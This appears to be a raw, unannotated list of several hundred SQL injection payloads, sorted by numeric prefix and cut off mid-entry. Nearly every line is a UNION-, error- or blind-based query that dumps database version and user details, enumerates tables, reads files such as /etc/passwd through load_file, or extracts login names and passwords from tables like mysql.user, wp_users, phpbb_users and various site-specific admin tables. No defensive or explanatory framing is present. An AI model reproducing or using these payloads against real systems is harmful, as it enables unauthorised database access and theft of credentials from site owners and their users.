1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,72,71,73,74,75,76,77,78/* -78 union select 1,2,3,4,5,concat_ws(0x3a,version(),database(),user(),@@version_compile_os) ,7,8-- -78 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10/* -78 union select 1,2,3,concat(user,char(58),password),5,6,7,8,9 from mysql.user/* -78 UNION SELECT 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7 -- -78' union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,user(),version(),database()),0x55),0x55),4,5/* -78 union select 1,2,concat(version(),0x3a,user(),0x3a,database()) -78 union select 1,2,concat_ws(0x3a,user(),version()),4,5,6,7,8,9,0,11,12-- -78 union select 1,concat(0x2a,user(),0x2a,database(),0x2a,version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 -78 union select 1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,0,11,12,13 from mysql.user-- -78 union select 1,load_file(0x2f6574632f706173737764),3,4,5,6,7,8,9,0,11,12,13 from mysql.user/* 78 union select concat_ws(0x3a,user(),database(),version(),@@version_compile_os),2 -- -78 union select concat_ws(0x3a,user(),version(),database()),2,3,4,5,6,7,8,9,0,11,12,13,14,15,16-- 791000 union select 1,2,3,concat_ws(0x3a,user,pass),5,6,7,8 from users/* -792 and 1=2 union select 1,2,3,concat_ws(char(58),@@version,user(),database(),@@version_compile_os),5,6,7,8,9,10,11,12-- -7942 union select 1,version(),user(),database(),5,6-- -7947' union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28-- -794 union select 1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,0,1,2,3,4,5,6,7,8,9,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),1,concat_ws(0x3a3a,login,pwd),3 from users-- 795' and 1=2 union select concat_ws(0x3a,user(),version(),database()),2-- 79646 union select 1,2,3,4,table_name,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24 from information_schema.tables limit 22,1 7967 union select 1,2,3,concat_ws(0x3a,user(),version(),database(),username,password),5,6 from users-- -796 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,version(),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82/* -796 union select 1,2,concat(version(),0x3a,user(),0x3a,database()),4-- 79746 union select 1,2,3,concat(version(),0x3a,database(),0x3a,user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21/* 798198779 union select 1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 798369877457986 union select 1,2,3,4,concat_ws(0x3a,version(),user(),database()),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49-- 79855434379877 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14-- 798747987 uNiOn select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15-- 798747987 union select 1,2,3,4,5,6,7,8,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71)-- 798750987077650 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,concat_ws(0x3a,version(),user(),database()),21,22,23,24-- 79875543241 union select 1,2,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32-- 798765519481 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25-- 7987986446 union select concat_ws(0x3a,version(),user(),database()),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- 798798654479 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20-- 79879874798754 union select AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),2,3,4,5,6-- 7987987646987987 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),user(),database()),12,13,14,15,16-- 798' aNd 1=0 UNION SELECT 1,version(),3,4,5,6,7,8,9,10 -- 7-999.9 union select 1,2,3,version(),5,6,7,8,9,10-- 7-999.9 union select 1,concat_ws(user(),version(),database()),3,4,5,6,7,8,9-- -799 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,concat_ws(0x3a,password,username),16,17 from users-- 79 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10 -- 79 and 1=2 UNioN sELect 79' or 79=(select top 1 table_name from information_schema.tables where table_name not in ( 'www_pagelogic','www_pagetype0_settings','www_pagetype1_settings','www_pagetype2_settings','www_pagetype3_settings','www_pagetype4_settings','www_pagetype8_settings','www_pagetypes','www_settings','www_template1c_specs')) -- -79' union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 /* -79 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14 from information_schema.tables /* -79 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,database(),version(),user()),11,12,13,14,15,16-- -79 union select 1,2,3,4,5,6,concat_ws(0x3a3a,id_usuario,Apodo,Correo_usuario,Pais,Acepta_contacto) from usuario -- -79 union select 1,2,3,4,5,6,unhex(hex(version())),8,9,10,11,12-- 79 union select 1,2,3,4,5,concat(user_name,char(58),user_password,char(58),user_id),7 from cpg130_users limit 1,3/* -79 union select 1,2,3,concat_ws(0x3a,@@version_compile_os,user(),version(),database()),5,6,7,8,9,0,1,2,3,4,5-- -79 union select 1,2,3,concat_ws(0x3a,version(),database(),user(),@@version_compile_os),5,6,7,8-- 79 union select 1,2,3,user(),5,6,7,8,9,10 limit 1,1/* -79 union select 1,2,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),4,5,6 -- -79 union select 1,2,convert(concat(username,0x3a,password) using latin1),4,5,6,7 from users/* -79' union select 1,2,unhex(hex(concat_ws(0x0b,version(),user(),database(),@@version_compile_os))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34-- -79 union select 1,concat(user,0x3a,pass),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from cphulkd.authslimit1 -- -79 union select 1,concat_ws(0x3a,pass,login),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from users -- -79 union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32 from information_schema.tables -- 7 and 0 union select 1,convert(user() using latin1),3,4/* -7' and 0 union select 1,DATABASE(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17 -- 7 and 1=0 union select 1,2,3,4,5,6,7,8,concat_ws(0x3a,login,pass),10,11 from admins-- 7 and 1=0 union select 1,2,3,4,5,table_name from information_schema.tables-- 7 and 1=0 union select 1,2,3,concat_ws(0x3a,username,password),5 from admins -- 7 and 1=0 union select 1,2,3,concat_ws(0x3a,version(),user(),database()),5-- 7 and 1=0 Union Select 1,2,3,version(),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 -- 7' and 1=0 union select 1,2,concat_ws(0x203a20,id,login,version()),4,5,6,7 from users limit 0,1/* 7' and 1=0 UNION SELECT 1,2,concat_ws(0x3a,user(),database()),4,5,6,email from users where id="119"/* 7 and 1=0 union select 1,2,concat_ws(0x3a,user,password,host,file_priv),4,5,6,7,8 from mysql.user 7 and 1=0 union select 1,2,concat_ws(0x3a,user(),version(),database()),4,5,6,7,8,9,10,11,12,13-- 7 and 1=0 union select 1,2,version(),database(),5,6,7-- 7 and 1=0 union select 1,concat_ws(0x3a,id,username,password),3,4,5 from users-- 7 and 1=0 union select 1,concat_ws(0x3a,uname,pwrd),3,4,5,6,7,8 from admin-- 7 and 1=0 union select 1,concat_ws(0x3a,user_level,user_id),concat_ws(0x3a,username,user_email,user_password,user_avatar) from phpbb_users where user_level>0 limit 1,1 7 and 1=0 union select 1,concat_ws(0x3a,user_login,user_pass),3,4,5,6,7,8 from wp_users-- 7 and 1=0 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7-- 7 and 1=0 union select group_concat(concat_ws(0x3a3a3a,Id,name,login,pass,accesslevel,Id,name,login,pass,accesslevel) separator 0x0b) from users limit 0,20-- 7 and 1=2 union all select 1,2,3,concat(username,char(58),password),5,6,7,8,9 from editor-- 7 AND 1=2 UNION SELECT 0,null,2,3,4-- 7 AND 1=2 UNION SELECT 1,2,group_concat(Username,0x3a,Password),4,5,6,7,8,9 FROM Utente -7 and 1=2 union select 1,concat_ws(char(58),@@version,user(),database()) -- 7 and 1=if(ascii(substring((select concat(name,pass) from users limit 0,1),1,1))>1,1,0)/* 7 and ascii(substring((select 1 from users limit 1),1,1))>1-- 7-August-2007' or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN ('pbcattbl','pbcatcol','achievements','appText','calendar_academic'))-- 7 limit 0 UNION SELECT CONCAT(version(),database(),user()),2,3,4,5-- 7' or (1,1)=(select count(0 ),concat((select version() from information_schema.tables limit 0,1),floor(rand(0)*2))from(information_schema.tables) group by 2)-- 7' or(1,1)=(select count(0),concat((select version() from information_schema.tables limit 1,1),floor(rand(0)*3))from(information_schema.tables) group by 2)-- 7 or 1 group by concat((select concat(version(),0x3a,user(),0x3a)),floor(rand(0)*2)) having avg(0) -- -7 or 1=(SELECT TOP 1 TABLE_NAME FROM INFORMATION_SCHEMA.TABLES WHERE TABLE_NAME NOT IN (SELECT ALL TOP x TABLE_NAME FROM INFORMATION_SCHEMA.TABLES))-- 7' OR (SELECT COUNT(*) FROM (SELECT 1 UNION SELECT 2 UNION SELECT 3)x GROUP BY CONCAT(MID((select concat_ws(0x3a,version(),database(),user())),1,63), FLOOR(RAND(0)*2))) -- # 7 union 7 union all select 1,2,3,4,concat(id,0x3a,lname,0x3a,pass,0x3a,username),6,7,8,9,10 from users-- 7 union select 0,concat(USER(),0x3a,VERSION(),0x3a,DATABASE()),2,3,4,5,6,7,8/* -7 union select 1,1,3,database()/* 7 /*!union*/ /*!select*/ 1,2,3,4,5,6,7,8,9 -7 union select 1,2,3,4,5,6,7,8,9,10,11 /* 7 union select 1,2,3,4,5,6,7,8,9,10,11,concat_ws(0x3a,version(),user(),database()),13,14-- -7 union select 1,2,3,4,5,6,7,8,9,10,concat_ws(0x3a,version(),database(),user()),12/* -7 UNION SELECT 1,2,3,4,5,6,7,8,9,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),11,12/* -7' UnIon selECt 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,user(),version(),database()),11,12,13 -- -7 UNION SELECT 1,2,3,4,5,6,7,8,9,version()/* 7 union select 1,2,3,4,5,6,7,8,9,version(),11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,85,86/* -7 union select 1,2,3,4,5,6,7,8,concat_ws(char(58,58),user(),database(),version()),10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37-- 7 union select 1,2,3,4,5,6,7,'text',9,10,11,12,13,14,15,16/* -7' UNION SELECT 1,2,3,4,5,6,AES_DECRYPT(AES_ENCRYPT(CONCAT_WS(0x3a,Version(),Database(),User()),0x71),0x71),8-- -7 union select 1,2,3,4,5,6,column_name,8,9,10,11,12,13,14,15 from information_schema.columns limit 1,60-- 7 union select 1,2,3,4,5,6,concat_ws(0x3a,version(),database(),user()),8,9,10,11-- -7 union select 1,2,3,4,5,6,concat_ws(0x7c,user(),0x7c,database(),0x7c,version()),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- -7 union select 1,2,3,4,5,6,group_concat(database(),0x3A,version(),0x3A,user()),8,9,10,11,12,13,14,15-- -7 union select 1,2,3,4,5,6,table_name,8,9,10,11,12,13,14,15 from information_schema.tables limit 1,60-- 7 union select 1,2,3,4,5,6,table_name,8,9 from information_schema.tables limit 17,1-- -7 union select 1,2,3,4,5,concat_ws(0x3a,user_id,username,user_password,user_email),7,8,9,0 from phpbb_users/* -7' union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,0,11,12,13,14,15,16,17 -- -7 union select 1,2,3,4,5,group_concat(0x0b,TABLE_NAME),7,8,9,10 from information_schema.tables-- -7 union select 1,2,3,4,aes_decrypt(aes_encrypt(concat_ws(0x3a,user,password),1),1) from mysql.user-- -7 union select 1,2,3,4,char(60,98,114,62,60,98,62,65,52,97,116,45,114,117,108,101,122,122,122,122,60,47,98,62),6,7,8,9/* -7 union select 1,2,3,4,concat(login,0x3a,pass),6,7 from accounts-- -7 union select 1,2,3,4,concat(login,0x3a,pwd),6,7,8,9 from japanplast_users/* -7 union select 1,2,3,4,concat(username,0x20,password),6,7,8,9,10,11,12 from administrator-- -7 union select 1,2,3,4,concat(username,0x3e,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from websiteadmin_admin_users-- -7 union select 1,2,3,4,concat_ws(0x3a,admin_login,admin_password),6,7,8 from admins -7 union select 1,2,3,4,concat_ws(0x3a,database(),user(),version())-- -7 union select 1,2,3,4,concat_ws(0x3b,version(),user(),database()),6,7,8,9 -- -7 union select 1,2,3,4,concat_ws(char(58,58),user(),database(),version()),6,7,8,9,10/* 7 union select 1,2,3,4,concat_ws(char(58),version(),database(),user())/* -7 union select 1,2,3,4,unhex(hex(concat_ws(0x20,version(),database(),user()))),6,7,8,9,10,11,12/* -7 union select 1,2,3,4,unhex(hex(database())),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 -- 7 union select 1,2,3,4,user() /* -7 UnIon selECt 1,2,3,4,version(),6,7,8,9 -- 7' UNION SELECT 1,2,3,CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),5,6,7,8,9,10,11 LIMIT 1,1/* -7 union select 1,2,3,concat(email,char(58),password),5,6,7,8,9,10,11,12,13,14 from partners -- -7 union select 1,2,3,concat(table_schema,char(58),table_name),5,6,7,8,9,10,11 from information_schema.columns where column_name=0x6c6f67696e limit 2,1/* -7 union select 1,2,3,concat(user(),0x3a,version(),0x3a,database()),5,6,7,8,9,10,11,12,13,14,15,16/* -7 UNION SELECT 1,2,3,concat_ws(0x3a3a,id,Name,Password),5,6,7,8,9,10,11,12,13,14,15,16,17 FROM password LIMIT 0,1 -- -7 union select 1,2,3,concat_ws(0x3a,user(),version()),5,6,7,8,9,0,1-- -7 UNION SELECT 1,2,3,concat_ws(0x3a,user(),version(),database())-- 7 union select 1,2,3,concat_ws(0x3a,version(),database(),user()),5,6,7,8,9,10,11,12,13,14,15,16,17,18 from user/* -7 union select 1,2,3,concat_ws(0x3a,version(),user(),database()) -7 union select 1,2,3,concat_ws(0x40,user(),version(),database()),5,6,7,8,9,10,11-- -7 union select 1,2,3,concat_ws(char(58),user(),version(),database()),5,6,7,8,9,10,11/* -7 union select 1,2,3,group_concat(0x0b,nick,pwd),5,6,7 from you_admin -- 7 UNION SELECT 1,2,3 LIMIT 1,1-- -7 union select 1,2,3,table_name,5,6,7,8 from information_schema.tables limit 16,1/* -7 union select 1,2,3,user(),5,6,7,8 -- -7 union select 1,2,3,user(),version(),database(),7,8/* -7 union select 1,2,aes_decrypt(aes_encrypt(concat_ws(0x3a,version(),user(),database()),0x71),0x71)/* 7 union select 1,2,concat(0x3a,version(),user(),database()),4,5,6,7 -7 union select 1,2,concat(user(),version,database(),@@version_compile_os),4,5,6 -7 union select 1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),4,5,group_concat(0x0b,table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 from information_schema.tables-- -7 union select 1,2,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),group_concat(0x0b,table_name),5,6 from information_schema.tables-- 7 union select 1,2,concat_ws(0x2a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25 limit 1,1/* -7 union select 1,2,concat_ws(0x3a3a3a,login,passwd),4,5,6 from users-- -7 union select 1,2,concat_ws(0x3a3a3a,login,password),4 from users -- 7' union select 1,2,concat_ws(0x3A3a,id,email,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17 from members-- -7' union select 1,2,concat_ws(0x3a3a,username,password,access_level),4,5,6,7,8,9,10 from users where access_level=1 -- -7 union select 1,2,concat_ws(0x3a3a,version(),database(),user()),4,5-- 7 union select 1,2,concat_ws(0x3a,login,passw),4 from main -7 union select 1,2,concat_ws(0x3a,user,password,file_priv),4 from mysql.user limit 0,1-- -7 union select 1,2,concat_ws(0x3a,version(),database(),user()),4,5,6,7,8,9,10,11,12,13/* 7 union select 1,2,concat_Ws(0x3a,version(),database(),useR(),@@version_compile_os),4,5 -7 union selecT 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9 -7 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13 -- 7 union select 1,2,concat_ws(0x3a,version(),user(),database()),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/* -7 union select 1,2,concat_Ws(0x3a,version(),user(),database(),@@version_compile_os) -7 union select 1,2,concat_ws(char(58,58),user(),database(),version()),4,5,6,7,8,9/* 7 union select 1,2,convert(concat_ws(0x3a,user,password) using latin1),4,5,6,7,8 from mysql.user-- -7 union select 1,2,database(),4,5-- -7 union select 1,2,group_concat(0x0b,TABLE_NAME),4,5 from information_schema.tables-- -7 UnIon seLEct 1,2,group_concat(table_name),4,5,6,7 from information_schema.tables group by table_schema -- -7 UNION SELECT 1,2,group_concat(table_name separator 0x3a),4 from information_schema.tables where table_schema=0x7a72736f735f7a72736f -- -7 union select 1,2,group_concat(user,char(58),pass1),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from subse_seguridad.usuarios -7 union select 1,2,group_concat(user,char(58),password),4,5,6 from mysql.user -7 union select 1,2,group_concat(username,0x3a,password),4,5,6,7 from users/* -7 union select 1,2,unhex(hex(concat_ws(user(),version(),database()))),4,5 -7 union select 1,2,user(),4,5,6,7-- -7 union select 1,2,user(),4,5,6,7,8/* -7 union select 1,2,version(),4,5,6,7-- -7 union select 1,2,version(),4,5,6,7,8,9,10,11-- -7 union select 1,2,version(),4,5,6,7,8,9,10,11,12,13,14,15,16-- 7 union select 1,2,version(),4,5,6,7,8 limit 1,1/* -7' union select 1,2,version(),4,5,6,load_file('/etc/passwd'),8,9,10/* -7 union select 1,2,version(),user() -7 UNION SELECT 1,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x7873716C696E6A626567696E,LOAD_FILE(0x2F7661722F6370616E656C2F6370616E656C2E636F6E666967),0x7873716C696E6A656E64),0x71),0x71),3,4,5,6,7-- -7 union select 1,AES_DECRYPT(AES_ENCRYPT(version(),0x73),0x73),null,4,5,6,7 -7 union select 1,concat(0x3a,version(),0x3a,user(),0x3a,database(),0x3a),3,4,5,6-- -7 union select 1,concat(user(),0x2,database(),0x3,version()),3,4,5,6,7-- 7 union select 1,concat(user,char(58),password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23 from mysql.user/* -7 union select 1,concat(version(),0x0b,user(),0x0b,database(),0x0b,@@version_compile_os,0x0b),null,group_concat(0x0b,table_name) from information_schema.tables-- 7 union select 1,concat(Version(),0x3a,Database(),0x3a,User()),3 LIMIT 1,1 -7 union select 1,concat(@@version,0x3a,user(),0x3a,database(),0x3a,@@version_compile_os),0x494E43,4,5,6-- -7 union select 1,concat_ws(0x2f,version(),database(),user())/* -7' union select 1,concat_ws(0x3a3a,user,nome,email,password),3 from cliente -- -7 union select 1,concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os),3,4-- -7 union select 1,concat_ws(0x3a,database(),user(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- -7 union select 1,concat_ws(0x3a,database(),version(),user()),3,4,5,6-- -7 UNION SELECT 1,concat_ws(0x3a,email,password),3,4,5 FROM bagel.users LIMIT 1,1/* 7 union select 1,concat_ws(0x3a,name,password),3,4,5,6 from users limit 1,3 7 union select 1,concat_ws(0x3a,table_name),3,4 from information_schema.tables limit 0,1-- -7 union select 1,concat_ws(0x3a,table_name,table_schema),3,4,5 from information_schema.columns where column_name like 0x70617373776f7264 limit 0,1/* -7 union select 1,concat_ws(0x3a,username,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30 from jos_users-- -7 union select 1,concat_ws(0x3a,username,password),concat_ws(0x3a,user(),version(),database()),4 from administration-- -7 union select 1,concat_ws(0x3a,user, passwd, superadmin, news, cat, faq, files),3,4 from tdsp.tdsp_users -- -7 union select 1,concat_ws(0x3a,user(),version()),3-- -7 union select 1,concat_ws(0x3a,user(),version()),3,4,5,6,7,8,9,0,1,2,3,4,5-- -7 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5/* -7 union select 1,concat_ws(0x3a,user(),version(),database(),@@version_compile_os),3-- -7' UNION SELECT 1,concat_ws(0x3a,version(),database(),user()),3,4,5,6-- -7 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9 -7 ' UNION SELECT 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10 -- -7 union select 1,concat_ws(version(),0x3a,user(),0x3a,database()),3,4,5,6,7,8,9,10,11,12,13,14-- -7 union select 1,database(),3 -- -7 union select 1,database(),3/* -7' UnIoN SeLecT 1,database(),3,4,5,version() -- -7 union select 1,db_name(),3,4,5,@@version,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48-- -7' union select 1 from information_schema.tables -- 7 union select 1,group_concat(0x0b,table_name),3,4,5,6,7,8 from information_schema.tables -- -7 union select 1,group_concat(column_name),3,4 FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME=0x70687062625f61636c5f7573657273 -- -7' union select 1,group_concat(table_name),3,4,5,6,7,8,9,10,11 from information_schema.tables group by ' union select 1,2,3,4,5,6 -- -7' union select 1,id,3,4 from tbl_main/* -7 union select 1,pass,3,4,5 from users -- -7 union select 1,table_Name,3 from information_schema.tables limit 42,1 -- -7 union select 1,UNHEX(hex(concat(0x3c63656e7465723e3c68313e416e7469636861743c2f68313e3c2f63656e7465723e3c62722f3e,user(),0x3c62722f3e,version(),0x3c62722f3e,database()))),3,4,5,6,7,8-- -7 union select 1,USER(),3,4,5,6/* 7 union select 1,version(),3,user(),5,6,7,8,9,10 -- -7 union select 1,version(),concat_ws(0x2F,id,name,password),4,5,6,7 from ds_dizelist_users/* -7 union select 1,version(),database(),user() -7 union select 1,version(),database(),user(),5,6,7,8,9/* -7 union select aes_decrypt(aes_encrypt(version(),1),1) from user 7UNION SELECT CONCAT(0x7873716C696E6A626567696E,Version(),0x2F2A2A2F,Database(),0x2F2A2A2F,User(),0x7873716C696E6A656E64),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18 LIMIT 1,1/* -7 union select concat_ws(0x2a,version(),user(),database())-- 7 union select concat_ws(0x3a3a,version(),user(),database(),@@version_compile_os)-- 7 union select concat_ws(0x3a,username,password) from admin -7 union select concat_ws(0x3a,user(),version(),database()),2,3,4/* -7 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os),2,3,4,5,6/* 7 union select concat_ws(0x3a,version(),database(),user(),@@version_compile_os) limit 1,1 -7 union select concat_ws(0x3a,version(),user()),2-- -7 union select concat_ws(0x3a,version(),user(),database()),2,3-- -7 union select concat_ws(0x3a,version(),user(),database()),2,3/* 7' union select * from users/* 7 union select group_concat(admin,0x3a,admin_pass) from xp_sheets -- -7 union Select group_concat(table_name),2,3,4,5 from information_schema.tables group by table_schema /* -7 union select name from users where id=user_id/* (-7)union(select(NULL),2,3,concat_ws(0x3a, id, surname, name, father, sex, mail, pass, city, rest, rang, birth, start, tel),5,6,7,8,9,10,(NULL)from(ddbkiev_casting.users)) -- 7 union select null,null,null-- -7 union select null,null,to_char(1,123)-- 7 union select unhex(hex(concat_ws(0x3a,table_name))),2,3 from information_schema.tables limit 17,1-- -7 union select UNHEX(HEX(concat_WS(0x3a,Version(),Database(),user()))),2-- 7 union select version(),2 -7 union select version(),2,3-- -7 union select version(),2,3,4,5,6,7/* 80000000000000 union select 1,concat_ws(0x3a,user(),version(),database()),3,4,5,6,7,8 -- -800 union select 1,2,concat_ws(0x3a3a,version(),user(),database()),null,5,6,7/* -801 union select 1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a3a,username,password),14 from users/* -801 union select 1,concat_ws(0x3a,user,password),3,4,5,6,7,8 FROM mysql.user/* 80203 union select 1,2,3,4,5,6,7,8,9,10,11,12,version(),14,15,16,17,18,19,20,21,22,23,24,25/* -802 union select 1,2,3,concat(user(),char(58),database(),char(58),version()),5,6,7,username,password,10,11,12,13,14,15,16,17,18,19,20 from admin/* -802 union select 1,version(),3,4,5,6,7,8,9,0,1,2 -- -8036 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32/* -8036 union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null/* -803 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,concat_ws(0x3a,@@version,user(),database(),@version_compile_os),18 -- -803 union select 1,2,3,4,5,6,7,8,9,concat_ws(0x3a,version(),database(),user()),11,12,13,14,15 -803 union select 1,concat_ws(0x0b,version(),user(),database(),@@version_compile_os),3,null,group_concat(0x0b,Email,0x3a3a,UserPassword),6,7,8,9 from EH_Members-- 804353543534 union select 1,2,3,concat_ws(0x3a,username,hashed_password) from users limit 0,1 -804 union select 1,2,3,version(),5,6,7,8/* -804 union select 1,2,concat_ws(0x3a,version(),database(),useR(),@@version_compile_os),4,5-- 805 union select 1,2,3,4,5,6,7,8,9,10 limit 0,1 -- 805 union select 1,2,aes_decrypt(aes_encrypt(concat(user(),0x3a,version(),0x3a,database(),0x71),0x71),0x71),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19/* -805 union select 1,2,concat(user_email,char(58),user_icq,char(58),user_password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19 from phpbb_users limit 1,1/* -805 union select 1,2,user,password,5,6,7,8,9,10,11,12,13 from mysql.user limit 1,1/* 806 and 1=0 UnIon selECt 1,2,3,4,group_concat(table_name),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from information_schema.tables where table_schema=0x6175746f5f686a6175746f -- 806 and 1=0 Union Select 1,2,UNHEX(HEX(version())),4,5,6,7,8 -807061930 union select 1,TABLE_NAME,3,4,5,6,7,8,9,10,11 from INFORMATION_SCHEMA.TABLES limit 52,1/* -8077 union select 1,2,3,4,5,6,7,concat_ws(0x3a,user(),version(),database()),9,10,11,12,13,14 -807 union select 1,2,3,4,5,concat_ws(0x2f,version(),user(),database()),7,8,9,10,11,12,13,14,15,16/* 8082 or 1=(selecttop1table_name from information_schema.tables) 80878 union select concat_ws(0x3a,version(),user(),database()),2,3 -808 union select 1,concat_ws(0x2b,version(),user(),@@version_compile_os),3,4,5,6,7,8,9,10 -- 808 union select 808 -- 80980975644 union select 1,concat_ws(0x3a,version(),user(),database()),3,4,5,6,7,8,9,10,11,12,13,14-- 809809809809837107 union select 1,2,3,4,5,concat_ws(0x3a,user(),version(),database()),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24-- 809809809868764 union select 1,2,3,4,5,6,7,concat_ws(0x3a,version(),user(),database()),9,10-- 8098098369879877 union select 1,2,3,4,5,AES_DECRYPT(AES_ENCRYPT(CONCAT(0x3a,Version(),0x3a,Database(),0x3a,User(),0x3a),0x71),0x71),7-- 80980987676454809809 union select 1,2,3,concat_ws(0x3a,version(),user(),database())-- 809 and 1=0 union select 1,version(),3,4,5,6,7,8,9,10,11,12,13,14,15,16-- -80 and 1=2 union select 1,concat_ws(0x3a,@@version,user(),database(),@@version_compile_os),3,4 -- -80 union select 1,2,3,4,5,6,7,8,9,10 -- 80 union select 1,2,3,4,5,6,7,concat(srv_login,0x3a,srv_passw),9,0,1,2,3 from protruck_users/* -80 